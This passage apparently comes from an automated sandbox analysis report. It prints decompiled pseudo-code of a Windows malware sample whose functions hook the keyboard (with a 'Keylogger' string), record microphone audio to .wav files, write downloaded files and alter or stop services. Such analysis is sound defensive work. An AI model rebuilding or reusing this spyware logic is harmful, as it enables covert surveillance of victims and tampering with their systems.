								_t92 =  &(_t92[1]);
							} while (_t68 != 0);
							_t89 = _t92 - _t76;
							goto L15;
						}
						_t89 = 0x31;
						goto L15;
					}
					_t79 = _t70;
					_t81 =  &(_t79[1]);
					do {
						_t69 =  *_t79;
						_t79 =  &(_t79[1]);
					} while (_t69 != 0);
					_t76 = _t79 - _t81;
					goto L8;
					L21:
					_t85 = _t86 + 1;
				} while (_t86 != 0);
				if(_t91 != 0) {
					_push(_t76);
					 *_t72 = _v20;
					 *((char*)(_t72 + 0x154)) = 1;
					E00419D92(_t72, _v8, _v24, _t76, 1);
				}
				return _t91;
			}




































                                                                                                0x0041c7f3
                                                                                                0x0041c7f6
                                                                                                0x0041c7fc
                                                                                                0x0041c800
                                                                                                0x0041c803
                                                                                                0x0041c80b
                                                                                                0x0041c80e
                                                                                                0x0041c815
                                                                                                0x0041c9b5
                                                                                                0x00000000
                                                                                                0x0041c9b5
                                                                                                0x0041c823
                                                                                                0x0041c828
                                                                                                0x0041c82d
                                                                                                0x0041c9b0
                                                                                                0x00000000
                                                                                                0x0041c9b2
                                                                                                0x0041c83b
                                                                                                0x0041c840
                                                                                                0x0041c845
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041c84b
                                                                                                0x0041c84b
                                                                                                0x0041c851
                                                                                                0x0041c858
                                                                                                0x0041c85e
                                                                                                0x0041c872
                                                                                                0x0041c874
                                                                                                0x0041c877
                                                                                                0x0041c880
                                                                                                0x0041c894
                                                                                                0x0041c896
                                                                                                0x0041c89c
                                                                                                0x0041c8a1
                                                                                                0x0041c8a4
                                                                                                0x0041c8aa
                                                                                                0x0041c8ad
                                                                                                0x0041c8af
                                                                                                0x0041c8b7
                                                                                                0x0041c8f0
                                                                                                0x0041c8f0
                                                                                                0x0041c8f3
                                                                                                0x00000000
                                                                                                0x0041c8f3
                                                                                                0x0041c8b9
                                                                                                0x0041c8be
                                                                                                0x0041c8c0
                                                                                                0x0041c8c7
                                                                                                0x0041c8cc
                                                                                                0x0041c8d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041c8db
                                                                                                0x0041c8e0
                                                                                                0x0041c8e5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041c8e7
                                                                                                0x0041c8e8
                                                                                                0x0041c8ee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041c8ee
                                                                                                0x0041c92e
                                                                                                0x0041c937
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041c939
                                                                                                0x0041c93c
                                                                                                0x0041c945
                                                                                                0x0041c94f
                                                                                                0x0041c956
                                                                                                0x0041c95c
                                                                                                0x0041c961
                                                                                                0x0041c99e
                                                                                                0x0041c99e
                                                                                                0x0041c9a5
                                                                                                0x0041c9a7
                                                                                                0x0041c9a8
                                                                                                0x00000000
                                                                                                0x0041c9a8
                                                                                                0x0041c965
                                                                                                0x0041c975
                                                                                                0x0041c979
                                                                                                0x0041c98f
                                                                                                0x0041c993
                                                                                                0x0041c995
                                                                                                0x0041c995
                                                                                                0x00000000
                                                                                                0x0041c993
                                                                                                0x0041c984
                                                                                                0x0041c98a
                                                                                                0x0041c98d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041c98d
                                                                                                0x0041c967
                                                                                                0x0041c96f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041c96f
                                                                                                0x0041c882
                                                                                                0x0041c884
                                                                                                0x0041c887
                                                                                                0x0041c887
                                                                                                0x0041c889
                                                                                                0x0041c88a
                                                                                                0x0041c88e
                                                                                                0x00000000
                                                                                                0x0041c88e
                                                                                                0x0041c87b
                                                                                                0x00000000
                                                                                                0x0041c87b
                                                                                                0x0041c860
                                                                                                0x0041c862
                                                                                                0x0041c865
                                                                                                0x0041c865
                                                                                                0x0041c867
                                                                                                0x0041c868
                                                                                                0x0041c86c
                                                                                                0x00000000
                                                                                                0x0041c8f6
                                                                                                0x0041c8f8
                                                                                                0x0041c8f9
                                                                                                0x0041c903
                                                                                                0x0041c90b
                                                                                                0x0041c90f
                                                                                                0x0041c918
                                                                                                0x0041c91f
                                                                                                0x0041c924
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strstr$_strncpy
                                                                                                • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                                                                                                • API String ID: 1902495667-1012175531
                                                                                                • Opcode ID: 520ac5c39132e33c9ff3aec006f2acede2107cf21970011d3ed55495355a54b6
                                                                                                • Instruction ID: cd7da3a8f255e0bc2093fbe4f40c58f9e38a3687f7fab9f5ed61b317d639080b
                                                                                                • Opcode Fuzzy Hash: 520ac5c39132e33c9ff3aec006f2acede2107cf21970011d3ed55495355a54b6
                                                                                                • Instruction Fuzzy Hash: C151F4B5E843499BDF209E658CC1BEFB7A49B45304F18416BDC84A7342E2798982C79A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00406475, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E00406475(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E00451ED0();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E0040330C(0,  &_v48, __eflags, E00407677( &_v72,  &_a12, __eflags, L".part"));
				E00401EE2();
				_t37 = CreateFileW(E00401EDD( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = E00401EDD( &_a12);
					MoveFileW(E00401EDD( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = E00404C83( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E0040209D(_t58, _t82, _t74, _t85,  &_v12, 8);
								E00404BB7(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(E00401EDD( &_v48));
						}
					}
				}
				L9:
				E00401EE2();
				E00401EE2();
				return _t58;
			}





















                                                                                                0x0040647d
                                                                                                0x00406486
                                                                                                0x0040648a
                                                                                                0x0040648d
                                                                                                0x00406490
                                                                                                0x00406492
                                                                                                0x0040649f
                                                                                                0x004064ac
                                                                                                0x004064b4
                                                                                                0x004064ce
                                                                                                0x004064d7
                                                                                                0x004064da
                                                                                                0x004064dd
                                                                                                0x0040654f
                                                                                                0x00406550
                                                                                                0x00406559
                                                                                                0x00406568
                                                                                                0x0040656e
                                                                                                0x004064df
                                                                                                0x004064df
                                                                                                0x004064e2
                                                                                                0x00000000
                                                                                                0x004064e4
                                                                                                0x004064e4
                                                                                                0x004064e7
                                                                                                0x00000000
                                                                                                0x004064e9
                                                                                                0x004064e9
                                                                                                0x004064e9
                                                                                                0x004064f8
                                                                                                0x004064fd
                                                                                                0x004064ff
                                                                                                0x00406500
                                                                                                0x00406507
                                                                                                0x00406516
                                                                                                0x0040651c
                                                                                                0x00406527
                                                                                                0x00406531
                                                                                                0x00406538
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406540
                                                                                                0x00406543
                                                                                                0x00000000
                                                                                                0x0040654c
                                                                                                0x0040654c
                                                                                                0x00000000
                                                                                                0x0040654c
                                                                                                0x00000000
                                                                                                0x00406543
                                                                                                0x0040658c
                                                                                                0x0040659b
                                                                                                0x0040659b
                                                                                                0x004064e7
                                                                                                0x004064e2
                                                                                                0x00406570
                                                                                                0x00406573
                                                                                                0x0040657b
                                                                                                0x00406588

                                                                                                APIs
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004064CE
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406516
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00406550
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406568
                                                                                                • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 0040658C
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0040659B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                                                                                • String ID: .part
                                                                                                • API String ID: 820096542-3499674018
                                                                                                • Opcode ID: 92dd9859f071b579d5e718dfa42dd3fb22f93718b8df13da347ad2c13636152f
                                                                                                • Instruction ID: be89533d43fe4845dc1d95fb5f45a04cabfc61fa4ca913dd6281d477e5a4a642
                                                                                                • Opcode Fuzzy Hash: 92dd9859f071b579d5e718dfa42dd3fb22f93718b8df13da347ad2c13636152f
                                                                                                • Instruction Fuzzy Hash: 6C314A71D00218ABCB00EFA5DC869EEB778FB44315F10856FF912B71D1DA74AA44CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401CE1, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E00401CE1(void* __ebx, void* __edi, intOrPtr _a8) {
				char _v84;
				char _v112;
				void* _v116;
				char _v136;
				void* _v140;
				char _v160;
				void* _v164;
				char _v184;
				void* _v188;
				char _v204;
				char _v208;
				void* _v212;
				char _v228;
				char _v232;
				char _v236;
				void* __esi;
				void* _t29;
				intOrPtr _t43;
				void* _t75;

				_t47 = __ebx;
				_push(_t75);
				E00401F5F(__ebx,  &_v228);
				_t82 = _a8 - 0x3c0;
				if(_a8 == 0x3c0) {
					E004016F0();
					E00436419( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016E8());
					E00402076(__ebx,  &_v204,  &_v84);
					_t29 = E00417CCA( &_v112,  &_v208);
					E00401EEC( &_v232, _t31, _t75, E00403098(_t47,  &_v184, E00403022( &_v160, E00402FEC(__ebx,  &_v136, 0x46e0d4, 0x5c), _t29), __edi, _t82, L".wav"));
					E00401EE2();
					E00401EE2();
					E00401EE2();
					E00401EE2();
					E00401FB9();
					E00401A56(E00401EDD( &_v236), 0x46da78);
					waveInUnprepareHeader( *0x46dab0, 0x46da78, 0x20);
					0x46da78->lpData = E00401F87(0x46e0ec);
					_t43 =  *0x46dab4; // 0x0
					 *0x46da7c = _t43;
					 *0x46da80 = 0;
					 *0x46da84 = 0;
					 *0x46da88 = 0;
					 *0x46da8c = 0;
					waveInPrepareHeader( *0x46dab0, 0x46da78, 0x20);
					waveInAddBuffer( *0x46dab0, 0x46da78, 0x20);
				}
				return E00401EE2();
			}






















                                                                                                0x00401ce1
                                                                                                0x00401cf1
                                                                                                0x00401cf2
                                                                                                0x00401cf7
                                                                                                0x00401cfe
                                                                                                0x00401d08
                                                                                                0x00401d26
                                                                                                0x00401d3a
                                                                                                0x00401d4f
                                                                                                0x00401d83
                                                                                                0x00401d8c
                                                                                                0x00401d95
                                                                                                0x00401d9e
                                                                                                0x00401daa
                                                                                                0x00401db3
                                                                                                0x00401dca
                                                                                                0x00401dd8
                                                                                                0x00401dea
                                                                                                0x00401def
                                                                                                0x00401dfb
                                                                                                0x00401e02
                                                                                                0x00401e07
                                                                                                0x00401e0c
                                                                                                0x00401e11
                                                                                                0x00401e16
                                                                                                0x00401e25
                                                                                                0x00401e25
                                                                                                0x00401e38

                                                                                                APIs
                                                                                                • _strftime.LIBCMT ref: 00401D26
                                                                                                  • Part of subcall function 00401A56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ABE
                                                                                                • waveInUnprepareHeader.WINMM(0046DA78,00000020,00000000,?), ref: 00401DD8
                                                                                                • waveInPrepareHeader.WINMM(0046DA78,00000020), ref: 00401E16
                                                                                                • waveInAddBuffer.WINMM(0046DA78,00000020), ref: 00401E25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$F
                                                                                                • API String ID: 3809562944-2410650082
                                                                                                • Opcode ID: 439791445c359e82fea0f4087b347580bae1cee26d51ed52abe1849038b35182
                                                                                                • Instruction ID: 347f834822c73c8dafb4de3389cfef65f10b8848add3604802dc12ff50851c95
                                                                                                • Opcode Fuzzy Hash: 439791445c359e82fea0f4087b347580bae1cee26d51ed52abe1849038b35182
                                                                                                • Instruction Fuzzy Hash: E2315C31A082009BC314EB62DC45AAE77A8AB54308F10883EF556A21F1EFB89905CB4E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401BBF, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E00401BBF(void* __eflags) {
				signed short _t3;
				signed int _t7;
				signed int _t15;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t33;
				void* _t34;

				_t34 = __eflags;
				CreateDirectoryW(E00401EDD(0x46e0d4), 0);
				_t3 = 8;
				 *0x46daa6 = _t3;
				 *0x46da9c = 0x1f40;
				 *0x46daa0 = 0x1f40;
				0x46da98->wFormatTag = 1;
				 *0x46da9a = 1;
				 *0x46daa4 = 1;
				 *0x46daa8 = 0;
				_t7 = E004374E4(_t5, E00401F87(E00401E3B(0x46e3a4, 1, _t34, 0x24)));
				_t24 =  *0x46da9c; // 0x0
				 *_t33 = 0x30008;
				_t25 = _t24 * _t7 * 0x3c;
				 *0x46daac = _t25;
				 *0x46dab4 = (( *0x46daa6 & 0x0000ffff) >> 3) * _t25;
				waveInOpen(0x46dab0, 0xffffffff, 0x46da98, E00401CE1, 0, ??);
				E00401F76( *0x46dab4);
				0x46da78->lpData = E00401F87(0x46e0ec);
				_t15 =  *0x46dab4; // 0x0
				 *0x46da7c = _t15;
				 *0x46da80 = 0;
				 *0x46da84 = 0;
				 *0x46da88 = 0;
				 *0x46da8c = 0;
				waveInPrepareHeader( *0x46dab0, 0x46da78, 0x20);
				waveInAddBuffer( *0x46dab0, 0x46da78, 0x20);
				waveInStart( *0x46dab0);
				return 0;
			}










                                                                                                0x00401bbf
                                                                                                0x00401bcf
                                                                                                0x00401bd7
                                                                                                0x00401bdd
                                                                                                0x00401be5
                                                                                                0x00401bec
                                                                                                0x00401bf4
                                                                                                0x00401c02
                                                                                                0x00401c09
                                                                                                0x00401c10
                                                                                                0x00401c23
                                                                                                0x00401c28
                                                                                                0x00401c31
                                                                                                0x00401c43
                                                                                                0x00401c5a
                                                                                                0x00401c60
                                                                                                0x00401c65
                                                                                                0x00401c78
                                                                                                0x00401c8b
                                                                                                0x00401c90
                                                                                                0x00401c9c
                                                                                                0x00401ca1
                                                                                                0x00401ca7
                                                                                                0x00401cad
                                                                                                0x00401cb3
                                                                                                0x00401cb9
                                                                                                0x00401cc8
                                                                                                0x00401cd4
                                                                                                0x00401cde

                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BCF
                                                                                                • waveInOpen.WINMM(0046DAB0,000000FF,0046DA98,Function_00001CE1,00000000,00000000,00000024), ref: 00401C65
                                                                                                • waveInPrepareHeader.WINMM(0046DA78,00000020), ref: 00401CB9
                                                                                                • waveInAddBuffer.WINMM(0046DA78,00000020), ref: 00401CC8
                                                                                                • waveInStart.WINMM ref: 00401CD4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                • String ID: hpg$F
                                                                                                • API String ID: 1356121797-1242473504
                                                                                                • Opcode ID: 097767aace1de835545a3a18a84c3289a1f94376d5320f4cad483d40ad5015f6
                                                                                                • Instruction ID: b43c0b4c7f0bc09488247941d99da72d6ed0c481dd2e64c2db2638474b3c5267
                                                                                                • Opcode Fuzzy Hash: 097767aace1de835545a3a18a84c3289a1f94376d5320f4cad483d40ad5015f6
                                                                                                • Instruction Fuzzy Hash: 8D211B71F5C2009BC704AFF6AD05A2A7AA5AB99314704413BF509DAAB1FBF84442CB0E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00416FA1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E00416FA1(signed char __ecx, char _a4) {
				signed char _v5;
				void* _t7;
				signed int _t11;
				void* _t17;
				short* _t21;
				signed int _t24;
				int _t25;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_t21 = 0;
				_v5 = __ecx;
				_t7 = OpenSCManagerW(0, 0, 2);
				_t2 =  &_a4; // 0x4166e5
				_t24 = _t2;
				_t31 = _t7;
				_t28 = OpenServiceW(_t31, E00401EDD(_t24), 2);
				if(_t28 != 0) {
					_t25 = _t24 | 0xffffffff;
					_t11 = _v5 & 0x000000ff;
					if(_t11 == 0) {
						_push(4);
						goto L8;
					} else {
						_t17 = _t11 - 1;
						if(_t17 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t17 == 1) {
								_push(3);
								L8:
								_pop(_t25);
							}
						}
					}
					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
					CloseServiceHandle(_t31);
					CloseServiceHandle(_t28);
				} else {
					CloseServiceHandle(_t31);
				}
				E00401EE2();
				return _t21;
			}












                                                                                                0x00416fa4
                                                                                                0x00416faa
                                                                                                0x00416fac
                                                                                                0x00416fb1
                                                                                                0x00416fb9
                                                                                                0x00416fb9
                                                                                                0x00416fbc
                                                                                                0x00416fcb
                                                                                                0x00416fcf
                                                                                                0x00416fde
                                                                                                0x00416fe1
                                                                                                0x00416fe3
                                                                                                0x00416ff7
                                                                                                0x00000000
                                                                                                0x00416fe5
                                                                                                0x00416fe5
                                                                                                0x00416fe8
                                                                                                0x00416ff3
                                                                                                0x00000000
                                                                                                0x00416fea
                                                                                                0x00416fed
                                                                                                0x00416fef
                                                                                                0x00416ff9
                                                                                                0x00416ff9
                                                                                                0x00416ff9
                                                                                                0x00416fed
                                                                                                0x00416fe8
                                                                                                0x00417016
                                                                                                0x00417019
                                                                                                0x0041701c
                                                                                                0x00416fd1
                                                                                                0x00416fd2
                                                                                                0x00416fd2
                                                                                                0x00417021
                                                                                                0x0041702e

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,004166E5,00000000), ref: 00416FB1
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,004166E5,00000000), ref: 00416FC5
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004166E5,00000000), ref: 00416FD2
                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,004166E5,00000000), ref: 00417007
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004166E5,00000000), ref: 00417019
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004166E5,00000000), ref: 0041701C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                • String ID: fA
                                                                                                • API String ID: 493672254-3595381179
                                                                                                • Opcode ID: de021173c8de28d9e30fd25889429f2e16255a1cb3be46adac407d29f035805b
                                                                                                • Instruction ID: 872fa7bbc0d65cb7c3d4e84f7b41aeb549f60ef176ab0c045f5ceab408dcb1f0
                                                                                                • Opcode Fuzzy Hash: de021173c8de28d9e30fd25889429f2e16255a1cb3be46adac407d29f035805b
                                                                                                • Instruction Fuzzy Hash: 040189320082153BD2104B38AC4EEBF3E6CDB42771F20036FFA21961C1CA68CD8694A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004088C8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E004088C8(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				signed int _t36;
				void* _t38;

				_t38 = (_t36 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x46dae4 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E004088B1, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t43 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E00417C16(_t22,  &_v60, GetLastError());
						_t39 = _t38 - 0x18;
						E004053F2(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
						E00402076(_t22, _t39 - 0x14, "E");
						E00417670(_t22, 0);
						E00401FB9();
						_t8 = 1;
					}
				}
				return _t8;
			}















                                                                                                0x004088ce
                                                                                                0x004088d2
                                                                                                0x004088d7
                                                                                                0x004088df
                                                                                                0x00000000
                                                                                                0x004088e1
                                                                                                0x004088f1
                                                                                                0x004088f7
                                                                                                0x004088f9
                                                                                                0x004088fb
                                                                                                0x00408943
                                                                                                0x00408943
                                                                                                0x0040894b
                                                                                                0x00408951
                                                                                                0x00408953
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040895a
                                                                                                0x00408965
                                                                                                0x0040896b
                                                                                                0x0040896d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040896d
                                                                                                0x0040896f
                                                                                                0x0040896f
                                                                                                0x004088fd
                                                                                                0x00408909
                                                                                                0x0040890e
                                                                                                0x00408919
                                                                                                0x00408928
                                                                                                0x0040892d
                                                                                                0x00408939
                                                                                                0x00408940
                                                                                                0x00408940
                                                                                                0x004088fb
                                                                                                0x00408976

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088E3
                                                                                                • SetWindowsHookExA.USER32 ref: 004088F1
                                                                                                • GetLastError.KERNEL32 ref: 004088FD
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • GetMessageA.USER32 ref: 0040894B
                                                                                                • TranslateMessage.USER32(?), ref: 0040895A
                                                                                                • DispatchMessageA.USER32 ref: 00408965
                                                                                                Strings
                                                                                                • Keylogger initialization failure: error , xrefs: 00408911
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                • API String ID: 3219506041-952744263
                                                                                                • Opcode ID: 80eca2f812fb8f7f307cd005bec3554c7e057f8c058bdbc1a3625fcb41242d7e
                                                                                                • Instruction ID: f0c2aa1b87e516bca54503e6ed527ffc2aa6842bab34508ce6057f49a217e226
                                                                                                • Opcode Fuzzy Hash: 80eca2f812fb8f7f307cd005bec3554c7e057f8c058bdbc1a3625fcb41242d7e
                                                                                                • Instruction Fuzzy Hash: 9D118FB1A04201ABC710BBB5AD09C6B77ACEAD5759B10053EF881E22A1EE74C940C76B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00416DCF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00416DCF(char _a4) {
				struct _SERVICE_STATUS _v32;
				void* _t6;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x20);
				_t1 =  &_a4; // 0x41697a
				_t20 = _t6;
				_t19 = OpenServiceW(_t20, E00401EDD(_t1), 0x20);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE2();
				return _t16;
			}








                                                                                                0x00416dda
                                                                                                0x00416dde
                                                                                                0x00416de6
                                                                                                0x00416de9
                                                                                                0x00416df8
                                                                                                0x00416dfc
                                                                                                0x00416e1d
                                                                                                0x00416e20
                                                                                                0x00416e23
                                                                                                0x00416dfe
                                                                                                0x00416dff
                                                                                                0x00416dff
                                                                                                0x00416e28
                                                                                                0x00416e35

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041697A,00000000), ref: 00416DDE
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041697A,00000000), ref: 00416DF2
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041697A,00000000), ref: 00416DFF
